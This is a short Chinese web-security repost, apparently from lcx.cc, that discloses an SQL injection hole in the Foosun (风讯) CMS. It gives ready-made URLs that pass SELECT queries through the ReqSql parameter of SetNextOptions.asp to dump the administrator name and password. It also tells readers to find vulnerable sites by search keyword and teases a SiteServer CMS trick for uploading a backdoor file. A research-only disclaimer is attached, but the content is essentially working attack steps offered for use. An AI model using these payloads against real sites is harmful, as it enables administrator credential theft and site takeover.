风讯foosun的注册文件存在漏洞,可以暴管理员帐号和密码。
漏洞文件:
http://www.xxx.com/user/SetNextOptions.asp
利用简单的方法:
暴管理员帐号:
http://www.xxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
暴管理员密码:
http://www.xxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
关键字:
自己找,网络上很多的。
文章来源于lcx.cc:foosun (风讯) 最新注入漏洞
相关推荐: Siteserver CMS 最新批量拿站 0DAY
注册一个 a.asp 的用户,登陆后上传改名字的后门就行了。 注册地址:htpp://lcx.cc/UserCenter/register.aspx 后门路径:https://lcx.cc/UserFiles/a.asp/a.jpg …
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论